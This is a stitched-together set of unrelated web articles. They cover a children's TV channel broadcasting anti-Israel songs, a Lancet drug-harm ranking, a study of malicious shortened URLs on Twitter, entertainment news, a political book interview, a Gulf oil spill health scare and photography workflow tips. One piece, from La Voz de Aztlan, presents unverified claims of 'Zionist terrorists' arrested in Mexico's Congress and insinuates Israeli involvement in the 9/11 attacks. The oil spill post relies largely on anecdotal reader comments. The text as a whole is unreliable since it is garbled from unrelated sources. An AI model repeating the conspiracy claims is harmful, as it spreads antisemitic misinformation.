Allah will make our prayers come true . "
Shaheeds and birds .
The kid 's website
The channel has also produced other songs against Israel , such as " The lion cubs of Gaza " and " The upright ones – the return to Palestine . "
The songs are broadcast over the station which began operating in Bahrain in January 2008 .
It was established by Jordanian - Palestinian businessman Khaled Maqdad .
Maqdad , who formed the kids ' band of the same name in 1994 , has raised funds over the years to set up the station , which specializes in broadcasting the band 's clips .
In addition to the children 's songs , there are also an abundance of love songs to the homeland and songs praising " heroes like ( Sheikh ) Ahmad Yassin , " the wheelchair bound founder of Hamas whom Israel assassinated in March 2004 .
" This is a private low - budget project , " Maqdad said in a past interview with the al - Jazeera newspaper Al - Shuruq .
" The channel has captured the hearts of millions of children .
It succeeds where the educational system has failed , such as multiplication table songs .
It helps teachers work on it with the children . "
A new UK study suggests that the current UK drug classification system of A , B , and C of the Misuse of Drugs Act is flawed and should be replaced by an evidence - based system of potential harm that would place alcohol and tobacco higher than cannabis and ecstasy .
The study is published in The Lancet .
Professor David Nutt from the University of Bristol , Professor Colin Blakemore , Chief Executive of the Medical Research Council , and two colleagues developed a new drug ranking system that would class socially acceptable tobacco and alcohol as more harmful than cannabis , and considerably more dangerous than Class A drugs such as ecstasy and LSD .
They say the current classification system used in the UK is flawed and should be scrapped .
Their proposed system of classification asesses harm in an “ evidence - based fashion ” .
They use three main factors to determine the potential harm that a substance causes :
(1) Physical harm to the user ,
(2) Tendency to induce dependence in the user , and
(3) The effect of its use on families , communities and society in general .
Within each factor there are three sub-categories which altogether made up a nine - category “ matrix of harm ” .
Each category attracts a score of between 0 and 3 , with 3 representing the most harm .
An overall mean harm score of between 0 and 3 is then calculated for each drug .
They asked two independent expert panels to score 20 different substances using this new system .
The 20 drugs included five legal potentially misused substances ( alcohol , khat , solvents , alkyl nitrites , and tobacco ) and one recently classified one ( ketamine ) so that the league table showed some familiar “ benchmarks ” .
The two panels found the method easy to use and came up with very similar harm scores for each drug .
In order of overall harm , the 20 drugs were given the following ranking ( the most harmful , heroin at number 1 scored nearly 3 , while the least harmful khat at number 20 scored less than 1 ) :
(1) Heroin ( most harmful ) .
(2) Cocaine .
(3) Barbiturates .
(4) Street Methodone .
(5) Alcohol .
(6) Ketamine .
(7) Benzodiazepines .
(8) Amphetamine .
(9) Tobacco .
( 10 ) Buprenorphine .
( 11 ) Cannabis .
( 12 ) Solvents .
( 13 ) 4 - MTA ( para - methylthioamphetamine ) .
( 14 ) LSD .
( 15 ) Methylphenidate ( ritalin ) .
( 16 ) Anabolic steroids .
( 17 ) GHB ( gamma hydroxybutyric acid ) .
( 18 ) Ecstasy .
( 19 ) Alkyl nitrites .
( 20 ) Khat ( least harmful ) .
Prof Nutt who led the study said , “ Drug misuse and abuse are major health problems .
Our methodology offers a systematic framework and process that could be used by national and international regulatory bodies to assess the harm of current and future drugs of abuse ” .
Prof Blackmore said that while drug policy is aimed at reducing harm to users , their families and society as a whole , the present system was not a “ Rational , evidence - based method for assessing the harm of drugs ” .
He said the system they have devised , on the other hand , is .
“ We hope that policy makers will take note of the fact that the resulting ranking of drugs differs substantially from their classification in the Misuse of Drugs Act and that alcohol and tobacco are judged more harmful than many illegal substances , ” he added .
Under the current system in the UK , which is regulated by the Misuse of Drugs Act , drugs are classified in three groups , A , B and C .
The heaviest conviction penalties are applied for possession of Class A drugs ( up to 7 years in prison or unlimited fine or both ) , while Class C drugs are liable to the lowest penalties ( up to two years in prison , unlimited fine or both ) .
Class A drugs include : Ecstasy , LSD , heroin , cocaine , crack , magic mushrooms ( if prepared for use ) amphetamines ( if prepared for injection ) .
Class B drugs include : Amphetamines , Methylphenidate , Pholcodine .
Class C drugs include : Cannabis , tranquillisers , some painkillers , GHB , ketamine .
( Crystal meth is pending classification as a Class A drug . )
Profs Nutt , Blackmore and colleagues criticized the current Class A , B , C system saying it was too arbitrary , put too much emphasis on unusual reactions that affect very few users , and did not specify the relative risks of a drug .
In their conclusions they comment on what they see as its most glaring deficiencies :
“ The fact that the two most widely used legal drugs lie in the upper half of the ranking of harm is surely important information that should be taken into account in public debate on illegal drug use .
Discussions based on a formal assessment of harm rather than on prejudice and assumptions might help society to engage in a more rational debate about the relative risks and harms of drugs ” .
“ Development of a rational scale to assess the harm of drugs of potential misuse . ”
David Nutt , Leslie A King , William Saulsbury , Colin Blakemore .
The Lancet 2007 ; 369:1047-1053
DOI:10.1016/S0140-6736(07) 60464-4
Click here for full text of Article ( free subscription required ) .
Written by : Catharine Paddock
Writer : Medical News Today
Concern over the danger of shortened URLs may be overblown , according to a report released Wednesday by a researcher with security firm Zscaler .
Zscaler made the announcement in the wake of news from Twitter , which recently said it has implemented a new security system to scan all URLs posted in tweets to protect users from malicious sites .
Popular URL - shortening site bit.ly made a similar move in November .
But the security may not be as necessary as previously thought .
While Twitter and the shortened URLs used in Tweets are often blamed for leading users to malicious sites ( CSO wrote about their dangers in 3 Ways Twitter Security Falls Short ) , Zscaler 's Julien Sobrier found otherwise .
Sobrier did an investigation of Twitter links both before the new security scan system and after .
The researcher retrieved more than 1 million URLs from the public timeline over what he termed " a couple of weeks " before they put any protections in place .
Links were run through the Zscaler infrastructure to find out which links lead to malicious sites .
The experiment only looked for malicious sites such as phishing sites , malware , etc. , and did not include spam .
Results reveal on only 773 links led to malicious content ; a mere .06 percent , according to Sobrier .
Bit.ly represents 40 percent of all links , and roughly the same proportion of malicious links , according to Sobrier .
Another shortening site , TinyUrl , represents only 5 percent of all URLs and 6 percent of all malicious sites .
" It does not look like bit.ly 's phishing and malware protection is making it any safer than other URL shorteners , " Sobrier said in a blog posting on the research .
Sobrier goes on to say the key to protecting end users is real - time scanning of both the URL and the content .
" Twitter and bit.ly can only scan the links periodically , " he states .
" Malicious websites try to hide their malicious content to non-users by checking the user agent or geography and by requiring a real browser which fully understands Javascript , Flash , etc .
An attacker can present harmless content to the Twitter or bit.ly scanners , but harmful content to a real user . "
The elite alien - fighting squad of Torchwood — well , the two members who remain — will return at last .
The BBC announced a co-production deal with U.S. cable network Starz .
Update : Russell T. Davies speaks !
Advertisement
I think we can all heave a sigh of relief that the Fox version of Torchwood never came to pass .
Instead , the show seems to be staying under the BBC 's control , but with Starz fronting some money .
Starz president and CEO Chris Albrecht says the show " certainly will " have a larger budget thanks to the co-production deal .
And Albrecht tells the Hollywood Reporter ,
At the end of " Children of Earth , " Torchwood was destroyed , so when we pick up in our world the need for Torchwood arises again .
A lot of this story takes place in the U.S. as well with several characters that are in the U.S. intelligence forces and end up teaming up with Gwen and Captain Jack to deal with the situation at hand .
Advertisement
Adds creator Russell T. Davies :
It 's very much the next step .
It 's not a new version , it 's not a reboot .
We 're simply moving countries .
The show was previously a format show — monster of the week .
The breakthrough was " Children of Earth " and that it became one long story .
It 's not going to be ' Lost ' and take 20 years to find out what 's going on .
It 's going to have a most remarkable conclusion after 10 episodes .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
He adds that the first episode is the same pilot he wrote for Fox seven months ago , and Fox graciously allowed him to take the project to Starz .
And this will still be the same universe , where everybody knows aliens are real — but a new viewer will be able to jump in right away .
Here 's the official press release :
BBC Cymru Wales , BBC Worldwide and US premium entertainment network , Starz Entertainment , have today announced a three way co-production partnership that will develop a new series of the hit BBC sci - fi drama Torchwood .
BBC Worldwide will also distribute the series to broadcasters globally .
The 10 - episode instalment will be written by a team led by Torchwood creator , Russell T Davies , and produced by BBC Worldwide Productions .
Davies and BBC Worldwide Productions ' SVP Scripted , Julie Gardner , return as executive producers with BBC Worldwide Productions EVP Jane Tranter .
The series has been commissioned by Controller BBC ONE , Jay Hunt , Controller BBC Drama , Ben Stephenson , and Starz President and CEO , Chris Albrecht .
While previous series were based on location in Cardiff , Wales , this new instalment will see storylines widen to include locations in the U.S. and around the world .
John Barrowman and Eve Myles will return in their roles as Captain Jack and Gwen respectively , along with new faces .
Announcing the commission , Ben Stephenson , Controller , BBC Drama Commissioning said : " We have a long history of working with many U.S. networks but it is incredibly exciting to be working with Starz for the first time , as well as to be reunited with the best of British in Russell , Jane and Julie .
Torchwood will burst back onto the screen with a shocking and moving story with global stakes and locations that will make it feel bigger and bolder than ever " Jane Tranter , EVP , BBC Worldwide Productions , added : " Torchwood has attracted remarkable attention and loyalty in both the UK and U.S. , and in this new partnership with Starz , the next chapter will not only reward our current fans , but also introduce new viewers to the most impressive instalment yet . "
" We 're committed to programming exceptional television that is entertaining , imaginative and provides a premium TV experience , and by any measure the new concept for Torchwood fits that mandate , " Starz , LLC , President and CEO Chris Albrecht said .
" I 've been part of successful partnerships with Jane Tranter and the BBC previously , and I 'm very much looking forward to working with them again . "
Torchwood is a drama that puts extraterrestrial threats into a very real world , and asks how humanity deals with the danger - while fighting human 's darkest instincts .
The series was originally commissioned and produced in 2006 by BBC Cymru Wales , with the latest high octane series capturing UK audiences of more than 6 million .
BBC Worldwide has distributed previous Torchwood series around the world to territories such as Korea , Japan , Italy , Spain , Israel , Russia and across Latin America .
Advertisement
I think the time is right for a fan campaign to bring back Lois Habiba in a fairly major role .
Who 's with me ?
The Avatar hype machine is roaring at a Wagnerian pitch , but even James Cameron 's giant Ewok epic is handicapped in the 2010 race .
Why ?
Historically , Oscar voters are n't scifi fans .
Here are 10 of the Academy 's most egregious scifi snubs .
Advertisement
Speculative fiction has a crummy track record when it comes to the Academy Awards , and even when an iconic sci - fi flick scores Oscar nods , it tends to be ignored in everything but the technical categories ( see : E.T. , Star Wars ) .
Many of our top 10 unfairly overlooked scifi Oscar nominees have been vindicated by history , but we feel compelled to dredge these examples up , lest any Academy voters out there are considering giving the short shrift to District 9 .
( Note to disenchanted Moon fans : I stuck with films that were actually nominated .
Obviously if I had my druthers , the 1997 Academy Awards would 've been swept by Starship Troopers , with Casper Van Dien scoring Best Actor and – in an unprecedented move – Jake Busey and Neil Patrick Harris tying for the Best Supporting statuette . )
Advertisement
10 & 9 . ) Best Art Direction and Best Costume Design - 1982
What Won : Gandhi
What Should 've Won : Blade Runner ( Art ) and Tron ( Costume )
Gandhi's 1982 victory sweep left several important scifi films going home empty - handed .
And while Gandhi was n't a bad biopic , its near domination of the technical awards stole the spotlight from pioneering scifi flicks such as Blade Runner - whose set design set the template for cinematic dystopias to come - and Tron , whose now - hokey light - bright costumes framed how future audiences would perceive virtual reality worlds .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
8. ) Best Original Screenplay – 1985
What Won : Witness
What Should 've Won : Back To The Future or Brazil
Witness was a decent action flick about Amish folks versus an evil Danny Glover , but was it really more original than cinema 's first Oedipal time - travel comedy or the insane celluloid love child of Terry Gilliam and a typewriter ?
Advertisement
7. ) Best Art Direction – 1986
What Won : A Room With A View
What Should 've Won : Aliens
The Academy sure does love those darling 1900s period pieces .
Too bad it could n't give similar accolades to the blockbuster that catapulted Robert Heinlein 's space marine aesthetic into popular culture .
By the way , how many copies did Mass Effect 2 sell last week ?
Advertisement
6. ) Best Original Screenplay – 2006
What Won : Little Miss Sunshine
What Should 've Won : Pan's Labyrinth
Little Miss Sunshine had its moments , but the script overall read like Wes Anderson Mad Libs .
Steve Carrell played " Bill Murray as Sad Ol ' Bastard " and Paul Dano played " Jason Schwartzman as Socially Imbecilic Teen . "
Heck , the only thing missing were The Kinks songs .
On the other hand , Guillermo del Toro 's haunting Franco - era fairy tale more or less created its own genre .
5. ) Best Supporting Actor - 2000
Who Won : Benicio del Toro for Traffic
Who Should 've Won : Willem Dafoe for Shadow of the Vampire
Del Toro delivered a strong performance in Steven Soderbergh 's Traffic , but he was overshadowed by an equally talented ensemble cast .
Conversely , Dafoe 's portrayal of Max Schreck / Count Orlok made Shadow of the Vampire .
He 's menacing , occasionally hilarious , and totally unrecognizable under several pounds of prosthetic goop .
4. ) Best Supporting Actress - 1973
Who Won : Tatum O'Neal for Paper Moon
Who Should 've Won : Linda Blair for The Exorcist
A 10 - year - old O'Neal charmed Academy voters with her portrayal of a preternaturally mature lil ' grifter .
Meanwhile , a preteen Blair presumably scared votes away with her MA - rated portrayal of a Satanic Garbage Pail Kid .
Advertisement
3. ) Best Actor - 1998
Who Won : Roberto Benigni for Life Is Beautiful
Who Should 've Won : Ian McKellen for Gods and Monsters
Why did Hollywood have such a jones for Roberto Benigini for like a year ?
In retrospect , it 's like everyone in Tinseltown lost their minds over Benny Hill or something .
Anyway , Benigini 's flash - in - the - pan shenanigans yoinked a statuette away from Sir Ian , whose portrayal of gay Frankenstein auteur James
Whale was far more deserving .
Advertisement
2. ) Best Director - 1968
Who Won : Carol Reed for Oliver !
Who Should 've Won : Stanley Kubrick for 2001 : A Space Odyssey
In the mid-20th century , the Academy was notable for two things : A. ) heaping Oscars on yalping , pastel musicals nobody watches anymore and B. ) refusing to give Stanley Kubrick the time of day .
These two proclivities converged in 1968 , when Kubrick lost the Best Director Oscar to a herd of screaming orphans .
The failure to honor 2001 is perhaps one of the Academy 's greatest oversights , but there 's one particular genre snub that I find totally unconscionable , if only for posterity 's sake ...
1. ) Best Original Song - 1984
Who Won : Stevie Wonder for " I Just Called to Say I Love You " from The Woman in Red
Who Should 've Won : Ray Parker Jr. for " Ghostbusters " from Ghostbusters
The former is one of Stevie Wonder 's more middling songs .
You can hear it during excruciatingly sincere karaoke performances .
The latter is recorded music 's greatest paean to paranormal investigation .
And you always hear it during the good times .
Authoritarianism and Polarization in American Politics
Marc J. Hetherington , Jonathan D. Weiler
Cambridge University Press
Paperback , 234 pages , $ 23.16
Kindle edition 9.99
August , 2009
Money quote :
Considering our story up to now , we believe we have adduced powerful evidence for the increasingly central role that authoritarianism has come to play in structuring party competition , mass preferences and the relevant issue agenda of the past forty years .
Basic premise : Polarization in the electorate can be seen as a consequence of worldview , with more authoritarian voters favoring selected candidates perceived as being " tougher " or stricter , and with authoritarian and non-authoritarian voters having such different worldviews that passionate disagreement and polarization ensues even when political differences are small .
It applies between parties ( Bush v Kerry ) and intraparty ( H. Clinton v Obama . )
Authors : Marc J. Hetherington and Jonathan D. Weiler are academics , Hetherington in the Department of Political Science at Vanderbilt and Weiler in International Studies at University of North Carolina , Chapel Hill .
Hetherington has previously authored Why Trust Matters : Declining Political Trust and the Demise of American Liberalism and co-authored Parties , Politics , and Public Policy In America .
Weiler has authored Human Rights in Russia , and blogs at Weilerblog .
Readability / quality :
This is an absorbing read , though it is best tackled chapter by chapter to absorb the numerous charts , tables and references .
The authors have tried to make this accessible to the general audience while keeping a scholarly tone , and mostly succeeded .
The thesis is heavily supported by empirical data , which makes it especially impressive .
Who should read it : political junkies ; anyone interested in understanding why the 2008 Democratic primary aroused such passions ( my favorite chapter in the book ) ; anyone trying to predict how the oil spill crisis will play out politically ; David Broder , Lanny Davis , and anyone else who really wants to understand what happened to bipartisanship .
----
Interview with the author ( Jonathan D. Weiler – jweiler – will be available on line here for questions between 9 and 10 am ET ) :
Daily Kos :
Your book is about authoritarianism , not so much in the persona of a particular candidate but rather in the worldview of the voting constituents .
You also distinguish between authoritarianism and conservatism and note it can cut across parties in surprising ways , leading to significant polarization .
Have you an easy definition of what you mean by authoritarianism ? "
Jonathan D. Weiler : Most succinctly , we mean by authoritarianism a tendency to see the world in simple , clear , black and white terms in support of a social order that prefers sameness and uniformity over diversity and difference .
It also tends to prefer the concreteness of military conflict over the subtleties of diplomacy .
A tendency to disdain complexity and nuance and to evince intolerance of outgroups are typical ( though , of course not universal ) features of authoritarian - minded individuals .
The polarization we 've argued is now under way is a product of the degree to which this particular worldview , once broadly distributed between the parties , has now increasingly found a home in one party , the Republican Party .
And to emphasize , we also identify a non-authoritarian worldview , one characterized by a preference for thinking in shades of gray and privileging diversity and difference over sameness and uniformity .
That worldview , likewise , was once more broadly distributed between the two parties and has increasingly gravitated toward one party , the Democrats .
To be clear , we do n't argue that all authoritarians are Republicans and all non-authoritarians are Democrats .
But the degree to which they 've sorted themselves out between the parties , in response to historical events and the way the political parties have crafted their appeals to voters , makes this particular dimension - one 's level of authoritarianism - a powerful explanation of people 's political preferences .
Daily Kos :
One of the more fascinating examples of authoritarianism leading to polarization was the 2008 presidential primary ( you devote a full chapter to it in the book ) , with similar ideologies between the candidates but passionate differences between the supporters ?
Where ’s the passion gone in 2010 ?
How has this particular dynamic evolved ? "
Weiler : I think the dissolution of passion in 2010 is a product of the dissolution of the dynamics that drove the intensity in 2008 - the desire to boot out the incumbent party from the White House after eight years , the presence of two very dynamic , impressive candidates , but also the fact that they displayed dramatically different styles , offering a contrast not in policy terms , ( there was very little daylight between Obama 's and Hillary 's positions in 2008 , save on health care and , of course , the recently - passed bill reflects Hillary 's position more than Obama's ) but in terms of how they framed issues , the words they used , the sensibilities they projected .
My guess is that a fair number of those more authoritarian - minded Hillary voters would not have voted for Obama against McCain and that a larger number , who did , quickly came to have buyer 's remorse , as they were unhappy with the status quo but were never comfortable with Obama for a variety of reasons .
Of course , Obama has also disappointed a lot of progressives - his too - cozy approach to the financial sector , his complete reversals on campaign pledges concerning national security / civil liberties issues ( which he has n't even tried to defend ) and , more broadly , his failure to articulate a clear vision for how America , under his guidance , can be a better place from a progressive perspective ( more inclusive , more fair , more just ) than it was before he took office .
All of this has surely sapped a lot of pro-Obama passion .
But anti-Obama passion , certainly on the right , is driven , I believe , by some of the authoritarian dynamics as we describe them - most clearly evinced in the Tea Party movement , which has largely reduced criticism of Obama to its most elemental , simple , broad and visceral terms - that Obama represents an alien ideology and agenda that is destroying the traditional social order in America .
Daily Kos :
Throughout the book , you use scholarly reference , but also frequently cite political reporting to illustrate examples of how worldview plays out .
But reporters and journalists have their own narrative , which they use to contextualize their reporting .
" Washington is broken , " or " Obama is like [ fill in past President ] " .
Do you see the same dynamic in reporting as you see in the voting patterns of constituent groups ? "
Weiler :
What I find most notable about reporting from the perspective of authoritarianism 's role in polarization is the degree to which he - said / she - said reporting really precludes American political journalism from providing any context for how extreme the base of one political party has become .
Of course , I am going to sound like a rabid partisan myself when I say that , but so be it .
If you think about the kinds of things Sarah Palin repeatedly said during the 2008 campaign - from drill , baby , drill , to " real Americans , " to repeated overheated warnings about Obama and socialism , and then on to her post - campaign rhetoric , including death panels , etc , it 's extraordinary really .
This is not some fringe person , but a woman with a major political following who was the vice - presidential nominee of a major political party .
And if you think about the heroes of the most vocal elements of the GOP today , the Tea Party ( and yes , I regard them as a passionate faction of the GOP , not a meaningful alternative to either party ) , folks like Glenn Beck , who are trumpeting the most absurd , outlandish stuff imaginable , it 's quite extraordinary that political journalism still acts as if the center of gravity of our political discourse can simply be calibrated in the same way as always .
The Democrats say this , the Republicans say that , and the truth must be somewhere in the middle .
I heard Joe Scarborough , who passes for reasonable these days on the right , say the other day that he found Rand Paul too extreme in his views of the role of government in exactly the same way that he found Paul Krugman too extreme - one never wanting government involvement , the other always wanting it .
This was , in a nutshell , what I 'm talking about .
Paul Krugman is , despite his emergence as a major liberal pundit , a completely conventional economist - not a Marxist or a socialist in any historically valid understanding of those terms - a believer in the way markets function that is in line with the ( pro-capitalist ) profession as a whole and a famous supporter of things like free trade .
In a crisis , of the sort we 're now in , yes , he prefers a Keynesian approach .
But the idea that his view of the relationship between the government and the economy is the polar opposite of Rand Paul 's is just absurd .
Political journalism has failed miserably in contextualizing the changing center of gravity in political discourse , including ( though not limited to ) its failure to apprehend the increasing authoritarianism of the GOP .
LOS ANGELES – To promote Dead Space 2 , Electronic
Arts is spreading the word about faux religion Unitology in a mini-comic that apes the style and shape of a Chick tract .
In the image above , EA 's promotional comic
The Big Game for the upcoming sequel is shown beside an actual evangelical pamphlet published by Jack Chick that I found while wandering around downtown Los Angeles this week .
EA 's promo piece expertly mimics the style of the Christian tracts .
The Dead Space 2 comic depicts a futuristic basketball player suffering a serious injury , then discovering the healing power of Unitology – the fictional religion from the Dead Space universe .
Unitology is something of a cult and utilizes a code made of Marker Symbols , which are peppered about the scenery in the Dead Space survival - horror games .
The demo of Dead Space 2 being shown at E3 this week finds the game 's protagonist , Isaac Clarke , battling slavering xenomorphs in a baroque Unitology chapel .
Dead Space 2 will be released for the PlayStation 3 , Xbox 360 and PC in January 2010 2011 .
See Also :
Ernesto Cienfuegos : Zionist Terrorists Arrested Inside Mexican Congress
Los Angeles , Alta California - October 12 , 2001 - ( ACN )
We were alerted this morning by a subscriber from Mexico that two Israelis were arrested Wednesday inside the Palacio Legislativo de San Lбzaro ( Mexican Congress ) in Mexico City .
Both were armed with 9 mm automatics and one was carrying a military hand grenade , electrical wiring and other bomb related materials .
The Israeli Embassy at Sierra Madre 2155 , colonia Lomas de Chapultepec has close its doors to the Mexican Press and are refusing to talk .
The incident has been independently verified by La Voz de Aztlan through Mexican diplomatic , press and other sources in Mexico City .
The Chief of Legislative Security , Salvador Alarcуn , has also confirmed the arrest of the two Israeli terrorists .
One of them Saur Ben Zvi is a confirmed citizen of Israel and the other , Salvador Guersson , recently immigrated to Mexico from Israel .
It is has been determined by the Procuradurнa General de la Repъblica ( Mexican Department of Justice ) that Guersson is a retired Colonel of the Israeli Defense Forces and that he may now be operating as a MOSSAD agent .
It is not known how they were able to penetrate the extensive security system of the Mexican Legislative Palace .
This is a very grave incident with many serious international implications .
Many have questioned who may be really behind many of the recent terrorist acts around the world including the ones against the WTC and the Pentagon .
The Mexican public and congress has been reticent about declaring war against Islam along with the U.S.
It is possible that an act of terrorism against the Mexican Congress was planned in order to " terrorize " Mexico into towing the line against Islam .
La Voz de Aztlan will be on top of this developing story to report any additional developments .
Did You Know ?
Personal Quote : [ on being bullied as a child ]
I was pretty well grounded .
I was being teased and whatever and I did n't have anger skills , so I would go to the parents and say your children are brats and tell them they were bad parents .
Trivia :
In October 2013 he appeared as a special guest at the Monterrey ( Mexico ) HorrorFest .
See more
In October 2013 he appeared as a special guest at the Monterrey ( Mexico ) HorrorFest .
Trademark : His unusual facial structure See more
His unusual facial structure
Romanian experts have discovered the most ancient cave paintings found to date in Central Europe , aged up to 35,000 years old , Romanian and French scientists said Sunday .
The pictures show animals including a buffalo , a horse and even a rhinoceros .
" It is for the first time in Central Europe that ... art this old has been found and confirmed " , said a joint statement from the Romanian Federation of Speleology -- the scientific study of caves -- and Jean Clottes , an expert working with UNESCO .
It is a " major discovery " and " its authenticity is certain " , Clottes , a specialist in prehistoric art , told AFP .
He was called on by Romanian specialists to certify the discovery .
His team included cavers , a paleontologist , an archaeologist and two cave art specialists and estimated the drawings were " attributable to a period of ancient rock art , the Gravettian or the Aurignacian ( between 23,000 and 35,000 years ago ) . "
Carbon tests must confirm these estimates , they said .
The black - paint drawings , discovered three or four months ago in the Coliboaia cave in northwestern Romania , depict animals , including a buffalo , a horse , bear heads and rhinoceros , federation chief Viorel Traian Lascu said .
Explore further Mould problem " stable " at Lascaux cave
( c ) 2010 AFP
It ’s hard to quit one without the other ( Image : Sipa Press / Rex Features )
If drinking and smoking seem inextricably linked , perhaps it ’s because in the brain ’s pleasure centre they actually are .
Alcoholics often have a particularly hard time quitting cigarettes .
Traute Flatscher - Bader at the University of Queensland in Brisbane , Australia , and colleagues wondered why this should be .
So they did a post - mortem analysis of gene expression in the brains of smokers , alcoholics and those who had done both during their lives .
They found that a group of genes in the nucleus accumbens – an area involved in creating pleasurable …
575 SHARES Facebook Twitter
The Gulf of Mexico oil spill is already the worst environmental disaster in U.S. history , but what most people do n’t know is that it is rapidly turning into a public health disaster of frightening proportions .
Reports are scattered and mostly anecdotal at this point ( as BP and the U.S. government try to keep a lid on information getting out ) , but it is becoming increasingly clear that the oil spill in the Gulf of Mexico and / or the chemical dispersants being used are making a lot of people sick .
So far most of the reports have been about breathing difficulties , vomiting and various flu - like symptoms .
But it is the health effects that will take a long time to show up that are the most concerning .
For example , this oil spill has released massive amounts of benzene into the Gulf .
Benzene actually enters human cells and damages DNA material .
In fact , the Department of Health and Human Services tells us that exposure to benzene has been proven to cause leukemia .
So are we about to see a massive wave of cancer sweep the Gulf coast ?
At this point nobody knows .
What is becoming clear is that a whole lot of people are becoming ill .
Several days ago , the state of Louisiana announced that 71 cases of oil spill - related illnesses had been reported to the Louisiana Department of Health and Hospitals up to that point .
A significant number of those had not even been involved in any of the clean up efforts .
But the cases of illness are most prominent among those involved in cleaning up the oil spill .
CBS news has reported that more than 75 oil spill disaster workers have already been treated for mysterious symptoms .
The most common symptoms being reported by oil spill disaster workers include vomiting , dizziness , headaches and shortness of breath .
The wife of one fisherman who is involved in disaster relief efforts in the Gulf recently told CNN what her husband has been telling her about what is really going on out there ….
“ I received several calls from him saying , ‘ This one ’s hanging over the boat throwing up .
This one says he ’s dizzy , and he ’s feeling faint .
Everybody ’s loading up their stuff , tying up their rigs and going back to the docks . ' ”
Down in Texas , they are referring to these illnesses as “ TILT ” – Toxicant - Induced Loss of Tolerance .
The following is an excerpt from a local news report out of San Antonio… .
For weeks now , local hospitals have tracked patients with suspicious symptoms coming in from the gulf coast .
Doctors are having trouble distinguishing it from the flu .
“ What makes it challenging is that patients show up with non-specific symptoms .
Headaches , fatigue , problems with memory and concentration , upset stomach , ” lists Dr. Claudia Miller at UT Health Science Center .
So what in the world is causing all this ?
Nobody knows for certain yet .
But if the smell of the oil on some Gulf beaches is already so strong that it burns your nostrils , then what in the world is this oil going to do to our health ?
Needless to say , this is a story that the mainstream media needs to start following a lot more closely .
One of our readers named Debra from Louisiana recently left a comment describing the breathing difficulties and headaches that she is now experiencing ….
I live in Gretna , La just a little past the Huey P Long bridge .
I have had headaches for several days now .
I am also having trouble breathing like i am having a asthma episode .
I do n’t even have asthma .
If it gets any worse i am going to the hospital .
All i can say is someone needs to look into this seriously ,
The air smells like burning crayons ( that is the best way to explain it ) .
It has smelled like this for several days now .
A reader named Stacy on our sister website recently posted a very alarming comment regarding what is happening in her area down in Florida … .
We live in the navarre , florida area and in the past week almost every family we know has had vomiting and diarreha .
This could just be anecdotal – maybe we just have a stomach bug circulating , but it is strange .
We had a huge storm the week before it happened that blew in from the gulf so who knows .
Also , the city of destin , florida has taken it upon themselves to close the destin pass with their own purchased boom and barges .
This is an elite destination and they are not waiting around for bp and their hired prison workers to clean the beaches .
Apparently , the coast guard was at the meeting and told the locals that they will face criminal prosecution , but they do n’t care .
They are protecting their million dollar properties .
Another commenter from Louisiana named Joe says that everyone in his family is dealing with these kinds of health issues right now … .
We live near Hammond , LA which is some 60 miles NORTH of New Orleans , LA .
For the past two to three weeks we have been having mild flu like symptoms .
I hardly never get sick but cannot get ride of a runny nose and a constant headache that only goes away when I leave this area ( heading North ) .
My entire family has the same problems as well as many of our friends in the area .
The most frightening thing is that nobody knows exactly what we are dealing with here .
Are there any other factors other than all the oil that is causing all of these health issues ?
Are these illnesses being caused by the extremely high levels of methane that scientists have detected in the Gulf of Mexico ?
Are the 1 million gallons of dispersal agents such as Corexit 9500 and Corexit 9527 that BP has poured into the Gulf to blame ?
Are people becoming sick due to all the hydrogen sulfide and benzene being released by the oil spill ?
Considering the fact that exposure to benzene has been proven to cause leukemia , it is imperative that we get some answers sooner rather than later .
And unfortunately , the threat from this oil spill is only going to continue to grow .
The truth is that this is not just an “ oil leak ” .
This is an “ oil volcano ” that is pumping out oil at such high pressure that BP is totally at a loss for how to stop it .
In fact , BP ’s Chief Operating Officer Doug Suttles recently told CNN that BP ’s data indicates that BP can’t cap the leaking oil , or it might cause the well casing to blow out .
So when will this oil volcano be stopped ?
Nobody knows .
Meanwhile , at least one industry expert is estimating that the oil beneath the surface of the water already covers 40 % of the Gulf of Mexico. 40 % of the Gulf of Mexico ?
And it is still getting worse ?
It is hard to even find the words to describe how horrific this nightmare is becoming .
If you live along the Gulf coast and you know of some health issues where you live , please leave a comment below .
Hopefully if we all work together we can start to piece the facts together about this very dangerous health crisis … .
FRANKFURT — German prosecutors are investigating whether Russia 's main nuclear exporter broke European rules by routing Iran - bound cargo through Europe — an incident that diplomats say turned into a major battleground as world powers hashed out international sanctions against Iran .
The shipments would n't break sanctions agreed on at the United Nations , including new rules approved Wednesday .
But the U.S. and European Union plan to use their own regimes to put bigger obstacles in front of Iran 's nuclear development — and to make ...
I often envy photographers who shoot for fun and do n’t have the pressure of clients waiting for their images .
Not only can they take as much time as they like to review and process their images , but they can also play with the latest Photoshop actions and generally experiment with postproduction techniques .
Unfortunately , that ’s not so viable if you ’re running a photography business where time is money .
In my day - to - day life as a wedding photographer , it ’s vital for me to stay on top of things so I do n’t get left behind with a backlog of post - production work .
Over the years , I ’ve developed an efficient workflow that helps me to process my images quickly , while keep the quality level high .
The two key aspects to this workflow are simple :
A well - structured organisation system .
Fast image editing with a light touch of post - production .
If you ’re a professional photographer , focussing on these two elements will help you to run a more efficient business .
Even if you ’re not a professional , it ’ll help you to get more from your photography .
Read on to discover how simple post - production can be and how I create print - ready images at lightning speed .
In parts two and three I ’ll show you how you to take this further , using more advanced post - production techniques to take your images to the next level .
First , it ’s time to get organised .
Get organised
Have you ever struggled to find an image ?
Do you have images scattered over several computers , hard disks , folders and memory cards ?
I meet many photographers of varying experience at workflow seminars and it amazes me how many people use what seems to be a random file organisation system .
I ’m sure you wo n’t be surprised if I emphasise how important it is to organise your images into a logical , easy - to - search system .
Here are a couple tips that are simple but I know have revolutionised how some people store and manage their images .
Design a file system
We use Lightroom as our main post - production tool .
I think it ’s the best one - stop - shop for managing all aspects of digital image organisation and development .
That said , there are plenty of tools and applications on the market so choose one that works for you .
Whatever application you use , one of the main issues I ’ve found with most image management tools , Lightroom included , is that they try and ‘ help ’ by offering to import images to a file structure based on date alone .
I do n’t know about you but I struggle to remember important birthdays , let alone the date of a specific job .
So , my advice is do n’t organise by date alone – take control and design a system of folders that fits your photography .
Sit down and think about how your images should be stored and organised .
Each folder and sub - folder should have a logical relationship .
For example , a landscape photographer may have a parent folder called “ Season ” with sub -folders of “ Autumn ” , “ Winter ” , “ Summer ” & “ Spring ” .
A good way to approach this is to think about the types of photography that you capture .
